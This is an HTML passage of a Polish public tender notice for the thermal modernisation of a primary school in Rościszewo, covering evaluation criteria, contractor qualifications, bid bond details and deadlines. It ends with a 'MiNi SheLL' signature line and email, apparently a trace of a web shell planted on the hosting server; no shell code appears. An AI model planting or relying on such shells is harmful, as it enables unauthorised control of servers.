ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Postępowanie prowadzone jest w trybie podstawowym, bez negocjacji (art. 275 pkt 1 ustawy Pzp), a <br/>ocena ofert opiera się na kryteriach określonych w SWZ – Rozdział XXIV.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Efektywność energetyczna zastosowanych materiałów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ekologiczność floty pojazdów wykorzystywanej przy realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Poziom recyklingu odpadów budowlanych powstających podczas realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: <br/>1.1.	nie podlegają wykluczeniu z postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 1) i 4) ustawy Pzp; <br/>1.2.	spełniają warunki dotyczące: <br/>1.2.1.	zdolności do występowania w obrocie gospodarczym; <br/>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny. <br/>1.2.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny. <br/>1.2.3.	sytuacji ekonomicznej lub finansowej; <br/>Zamawiający nie precyzuje w powyższym zakresie żadnych wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny. <br/>1.2.4.	zdolności technicznej lub zawodowej. <br/>1.2.4.1.	Wykonawca spełni warunek jeżeli wykaże że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał roboty budowlane polegające na budowie, przebudowie lub modernizacji obejmujące swoim zakresem przedmiot zamówienia - zrealizował, co najmniej dwie roboty budowlane w zakresie budowy, przebudowy lub modernizacji obiektów użyteczności publicznej (obiektów należących do Kategoria IX – Budynki użyteczności publicznej niewymienione w innych kategoriach, przeznaczone do czasowego przebywania ludzi) o wartości nie mniejszej niż 1.500.000 zł każda, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania oraz podmiotów, na rzecz których roboty zostały wykonane z załączeniem dowodów określających, czy te roboty zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonywane, a jeżeli wykonawca z przyczyny niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>1.2.4.2.	Wykonawca spełni warunek jeżeli wykaże że dysponuje osobami które będą odpowiedzialne za kierowanie robotami budowlanymi posiadającymi kwalifikacje zawodowe, uprawnienia, doświadczenie i wykształcenie niezbędne do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nich czynności oraz informację o podstawie do dysponowania tymi osobami. W szczególności wykonawca musi dysponować: <br/>•	Kierownikiem robót budowlanych (branża architektoniczno-budowlana) – osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności architektonicznej lub konstrukcyjno-budowlanej. Uprawnienia zgodne z ustawą z dnia 7 lipca 1994 r. – Prawo budowlane oraz rozporządzeniem w sprawie samodzielnych funkcji technicznych w budownictwie.<br/>•	Kierownikiem robót sanitarnych (branża sanitarna) – osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych, centralnego ogrzewania oraz wentylacji. Uprawnienia zgodne z ustawą z dnia 7 lipca 1994 r. – Prawo budowlane oraz właściwym rozporządzeniem.<br/>•	Kierownikiem robót elektrycznych – osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. Uprawnienia zgodne z przepisami ustawy Prawo budowlane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">SKŁADANE Z OFETĄ<br/>1.	W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, wykonawca zobowiązany jest do złożenia wraz z ofertą oświadczenia o niepodleganiu wykluczeniu z postepowania w zakresie art. 108 ust. 1 pkt 1-6 i art. 109 ust. 1 pkt 1 i 4 ustawy Pzp - wzór oświadczenia stanowi załącznik Nr 3 do SWZ. <br/>2.	Oświadczenia Wykonawcy, że: <br/>2.1.	nie podlega wykluczeniu z postępowania na podstawie art. 5k rozporządzenia Rady (UE) nr 833/2014 z dnia 31 lipca 2014r. dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi sytuacje Ukrainie, <br/>2.2.	nie zachodzą w stosunku do niego przesłanki wykluczenia z postępowania na podstawia w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego - załącznik nr 9 do SWZ. <br/>3.	Pełnomocnictwo (jeżeli dotyczy) <br/>4.	Zobowiązanie podmiotu trzeciego - załącznik nr 8 do SWZ (jeżeli dotyczy)<br/>5.	Wykaz rozwiązań równoważnych (jeżeli dotyczy)<br/>6.	Zastrzeżenie tajemnicy przedsiębiorstwa (jeżeli dotyczy)<br/><br/>SKŁADANE NA WEZWANIE<br/>1.	Wykonawca, którego oferta zostanie najwyżej oceniona, zostanie wezwany przez zamawiającego, do złożenia w terminie nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych aktualnych na dzień ich złożenia: <br/>1.1. Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonego nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. <br/>1.2.	Oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej; – zgodnie z załącznikiem Nr 4 do SWZ.<br/>Szczegóły zawiera Rozdział XIII SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">SKŁADANE Z OFETĄ<br/>1.	W celu potwierdzenia spełniania warunków udziału w postepowaniu o udzielenie zamówienia publicznego, wykonawca zobowiązany jest do złożenia wraz z ofertą oświadczenia o spełnianiu warunków udziału w postepowaniu - wzór oświadczenia stanowi załącznik Nr 2 do SWZ. <br/><br/>SKLADANE NA WEZWANIE<br/>2.	Wykonawca którego oferta zostanie najwyżej oceniona, zostanie wezwany przez zamawiającego, do złożenia w terminie nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych aktualnych na dzień ich złożenia w postaci: <br/>2.1.	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty, zgodnie z załącznikiem nr 7 do SWZ. <br/>(Wykonawca wykaże że wykonał: roboty budowlane polegające na budowie, przebudowie lub modernizacji obejmujące swoim zakresem przedmiot zamówienia - zrealizował, co najmniej dwie roboty budowlane w zakresie budowy, przebudowy lub modernizacji obiektów użyteczności publicznej (obiektów należących do Kategoria IX) o wartości nie mniejszej niż 1.500.000 zł każda)) – załącznik nr 5 SWZ<br/>2.2.	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; (W szczególności wykonawca musi dysponować: <br/>	Kierownikiem robót budowlanych (branża architektoniczno-budowlana) – osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności architektonicznej lub konstrukcyjno-budowlanej. Uprawnienia zgodne z ustawą z dnia 7 lipca 1994 r. – Prawo budowlane oraz rozporządzeniem w sprawie samodzielnych funkcji technicznych w budownictwie.<br/>	Kierownikiem robót sanitarnych (branża sanitarna) – osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych, centralnego ogrzewania oraz wentylacji. Uprawnienia zgodne z ustawą z dnia 7 lipca 1994 r. – Prawo budowlane oraz właściwym rozporządzeniem.<br/>	Kierownikiem robót elektrycznych – osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. Uprawnienia zgodne z przepisami ustawy Prawo budowlane.<br/>zgodnie z załącznikiem nr 6 do SWZ;<br/>Szczegóły zawiera Rozdział XII SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Zamawiający wymaga złożenia przedmiotowych środków dowodowych w celu potwierdzenia zgodności oferowanych materiałów i rozwiązań z wymaganiami określonymi w dokumentacji zamówienia, w tym w szczególności z kryteriami oceny ofert opisanymi w Rozdziale XXV SWZ.<br/>2.	Wykonawca zobowiązany jest dołączyć do oferty następujące przedmiotowe środki dowodowe:<br/>2.1.	Efektywność energetyczna zastosowanych materiałów (kryterium oceny ofert – 10 punktów):<br/>a)	deklaracje właściwości użytkowych (DoP), certyfikaty CE, karty techniczne producenta potwierdzające współczynniki:<br/>•	przewodzenia ciepła λ (dla materiałów izolacyjnych),<br/>•	przenikania ciepła U (dla stolarki okiennej i drzwiowej),<br/>•	klasę energetyczną (dla opraw LED).<br/>b)	dokumenty muszą być wystawione przez producenta lub jednostkę uprawnioną, zawierać odniesienie do konkretnego wyrobu i być aktualne na dzień złożenia oferty.<br/>2.2.	Ekologiczność floty wykorzystywanej do realizacji zamówienia (kryterium oceny ofert – 10 punktów):<br/>a)	wykaz pojazdów i maszyn przewidzianych do realizacji zamówienia z podaniem:<br/>•	marki, modelu, numeru rejestracyjnego (jeśli dotyczy) <br/>•	normy emisji spalin EURO (dla pojazdów) lub Stage (dla maszyn budowlanych).<br/>Załącznik 13 do SWZ<br/>b)	kopie dowodów rejestracyjnych z wpisaną normą EURO, certyfikaty producenta, dokumenty homologacyjne, karty techniczne.<br/>c)	oświadczenie Wykonawcy potwierdzające, że zadeklarowana flota będzie wykorzystywana w ramach realizacji niniejszego zamówienia.<br/>2.3.	Poziom recyklingu odpadów budowlanych (kryterium oceny ofert – 10 punktów):<br/>a)	Plan gospodarki odpadami budowlanymi zawierający:<br/>•	szacunkową masę odpadów,<br/>•	sposób ich segregacji i przewidywane frakcje,<br/>•	dane podmiotów odbierających odpady wraz z typem decyzji (R3, R5 itd.),<br/>•	deklarowany poziom recyklingu wyrażony procentowo.<br/>b)	oświadczenie Wykonawcy o osiągnięciu zadeklarowanego poziomu recyklingu oraz realizacji gospodarowania odpadami zgodnie z przepisami prawa.<br/>Załącznik nr 14 do SWZ<br/>3.	Przedmiotowe środki dowodowe muszą być sporządzone w języku polskim lub przetłumaczone na język polski przez tłumacza przysięgłego. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1. W przypadku nieprzedłożenia wymaganych przedmiotowych środków dowodowych lub złożenia dokumentów niepotwierdzających spełnienia wymagań, oferta zostanie oceniona jako niezgodna z wymaganiami SWZ i odrzucona na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>2.	Zamawiający informuje, że w przypadku, gdy Wykonawca nie złoży wymaganych przedmiotowych środków dowodowych, o których mowa w niniejszym rozdziale (dotyczących m.in. parametrów materiałów, klasy energetycznej opraw, norm emisji spalin pojazdów, poziomu recyklingu odpadów), lub złoży je w sposób niekompletny, nieczytelny bądź niepotwierdzający spełniania warunków określonych w SWZ, może – na zasadach określonych w art. 107 ust. 2 ustawy Pzp – wezwać Wykonawcę do ich uzupełnienia w wyznaczonym terminie.<br/>3.	Uzupełnione środki dowodowe nie mogą prowadzić do zmiany treści oferty. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Oferta musi zawierać: <br/>1.1.	wypełniony formularz ofertowy – według załącznika nr 1 do SWZ; <br/>1.2.	kosztorys ofertowy <br/>1.3.	oświadczenie o niepodleganiu wykluczenia – według załącznika nr 2 do SWZ; <br/>1.4.	oświadczenie o spełnianiu warunków udziału w postepowaniu – według zał. nr 3 do SWZ; <br/>1.5.	zobowiązanie podmiotu (jeżeli dotyczy) – według załącznika nr 8; <br/>1.6.	pełnomocnictwo – jeśli jest wymagane; <br/>1.7.	potwierdzenie wniesienia wadium (oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądz). <br/>1.8.	Wypełniony wykaz sprzętu wraz z oświadczeniem – według załącznika nr 13 do SWZ;<br/>1.9.	Wypełniony plan gospodarki odpadami wraz z oświadczeniem – według załącznika nr 14 do SWZ<br/>1.10.	Dokumenty wynikające z Rozdziału VII SWZ stanowiące przedmiotowe środki dowodowe <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający określa kwotę wadium w wysokości 56.900 zł (słownie: pięćdziesiąt sześć tysięcy dziewięćset złotych).<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2. Ustawy Pzp.<br/>3. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>4. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>4.1. pieniądzu;<br/>4.2. gwarancjach bankowych;<br/>4.3. gwarancjach ubezpieczeniowych;<br/>4.4. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>5. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego– Urząd Gminy Rościszewo, Bank Spółdzielczy w Starej Białej, Odział Sierpc, Filia Rościszewo Nr 07 9015 0001 2600 0101 2000 0020.<br/>6. W przypadku wadium wniesionego w pieniądzu oraz z treści gwarancji i poręczeń, jeżeli wadium będzie wniesione w tych formach, musi wynikać, że wadium zabezpiecza ofertę wykonawcy złożoną w postępowaniu o udzielenie zamówienia publicznego - oznaczenie sprawy: RRGKB.271.4.2025 „Termomodernizacja budynku Szkoły Podstawowej im. Fryderyka Chopina w Rościszewie”.<br/>7. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.<br/>8. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 4.2-4.4, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>Szczegóły zawiera Rozdział XXVII SWZ <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wymagania formalne dla wykonawców wspólnie ubiegających się o zamówienie (konsorcjum):<br/>1. Ustanowienie pełnomocnika. W przypadku wspólnego ubiegania się o zamówienie, wykonawcy są zobowiązani do ustanowienia pełnomocnika do:<br/>- reprezentowania ich w postępowaniu albo<br/>- reprezentowania w postępowaniu i zawarcia umowy (§ VI pkt 14.1 SWZ, § XIII pkt 3.2–3.6).<br/>2. Składanie oświadczeń<br/>Każdy z wykonawców składa osobno:<br/>- oświadczenie o spełnianiu warunków udziału w postępowaniu – w zakresie, w jakim dany wykonawca je spełnia (SWZ § XII pkt 1.1),<br/>- oświadczenie o braku podstaw wykluczenia – dotyczy każdego członka konsorcjum (SWZ § XIII pkt 1.1 oraz 7.7).<br/>3. Wymóg załączenia umowy konsorcjum<br/>Przed podpisaniem umowy, jeśli oferta wykonawców wspólnych została wybrana, zamawiający żąda kopii umowy/porozumienia regulującego współpracę tych wykonawców (SWZ § VI pkt 14.3).<br/>4. Forma oferty<br/>Ofertę w imieniu wszystkich wykonawców składa ustanowiony pełnomocnik (SWZ § XV pkt 7).<br/>Zasady oceny warunków udziału – konsorcjum:<br/>1. Łączne spełnianie warunku doświadczenia W odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą łącznie spełniać warunki udziału (SWZ § XI pkt 3). 2. Ocena zdolności każdego wykonawcy Zamawiający może ocenić negatywnie zdolność techniczną wykonawcy, jeżeli zachodzą przesłanki, że jego zasoby są zaangażowane w inne projekty – dotyczy to każdego członka konsorcjum (SWZ § XI pkt 4).<br/>Dokument wymagane od konsorcjum<br/>1. Oświadczenie z art. 125 ust. 1 Pzp- Każdy wykonawca<br/>2. Oświadczenie o niepodleganiu wykluczeniu (zał. nr 3) - Każdy wykonawca<br/>3. Oświadczenie dot. agresji na Ukrainę (zał. nr 6) - Każdy wykonawca<br/>4. Pełnomocnictwo (jeśli dotyczy) - W imieniu wszystkich członków Umowa konsorcjum (przed podpisaniem umowy) w imieniu wszystkich członków <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Z wybranym wykonawcą zostanie podpisana umowa w sprawie zamówienia publicznego na warunkach określonych w projektowanych postanowieniach umowy, stanowiących załącznik nr 7 do SWZ. <br/>2.	Zakres świadczenia wykonawcy jest tożsamy z jego zobowiązaniem zawartym w ofercie. <br/>3.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 ustawy Pzp oraz wskazanym w projektowanych postanowieniach umowy. <br/>4.	Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-30 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę drogą elektroniczną w rozumieniu przepisów ustawy Pzp i wprowadza ją do oprogramowania JOSEPHINE, które znajduje się pod adresem internetowym https://JOSEPHINE.proebiz.com/.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-30 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-28</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com